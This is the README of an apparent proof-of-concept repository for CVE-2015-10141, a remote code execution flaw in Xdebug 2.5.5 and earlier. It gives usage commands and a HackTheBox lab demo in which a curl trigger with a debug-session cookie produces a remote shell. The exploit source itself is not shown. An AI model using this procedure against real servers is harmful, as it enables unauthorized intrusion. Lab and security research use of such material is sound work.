Proof-of-Concept exploit script for Xdebug 2.5.5 and earlier versions (CVE-2015-10141).# PoC-CVE-2015-10141
**Custom Python exploit for Xdebug ≤ 2.5.5 (CVE-2015-10141).**
---
## Description
This repository contains my **Proof-of-Concept (PoC) exploit** for the **Xdebug remote code execution vulnerability** in versions **2.5.5 and earlier**.
The script leverages the **unauthenticated debugging protocol** exposed on port `9000` to achieve **remote command execution**.
- **Vulnerability**: [CVE-2015-10141](https://nvd.nist.gov/vuln/detail/CVE-2015-10141)
- **Vulnerability type**: Remote Code Execution (RCE)
- **Affected software**: Xdebug ≤ 2.5.5
---
## Usage
```bash
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py
```
When prompted, enter the target IP where Xdebug is hosted.
Demonstration from my recent HackTheBox [Olympus](https://github.com/n0m4d22/HackTheBox-Writeups/blob/main/machines/medium/olympus/olympus-writeup.md) (Medium) write-up :
```bash
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data
```
---
## Requirements
- Python 3.x
- Target running Xdebug ≤ 2.5.5 with remote debugging enabled
---
## Disclaimer
This project is created for educational purposes only.
**Do NOT** use this exploit against systems without explicit authorization. I am not responsible for any misuse of this code.
---
## References
- [NVD – CVE-2015-10141](https://nvd.nist.gov/vuln/detail/CVE-2015-10141)
- [ExploitDB – 44568](https://www.exploit-db.com/exploits/44568)
- [Xdebug Official Site](https://xdebug.org/)
[4.0K] /data/pocs/6d4d1795607b5b2f408b047dcdff0f551507ce32
├── [1.0K] LICENSE
├── [4.0K] PoC-CVE-2015-10141
│ └── [2.9K] exploit.py
└── [1.7K] README.md
1 directory, 3 files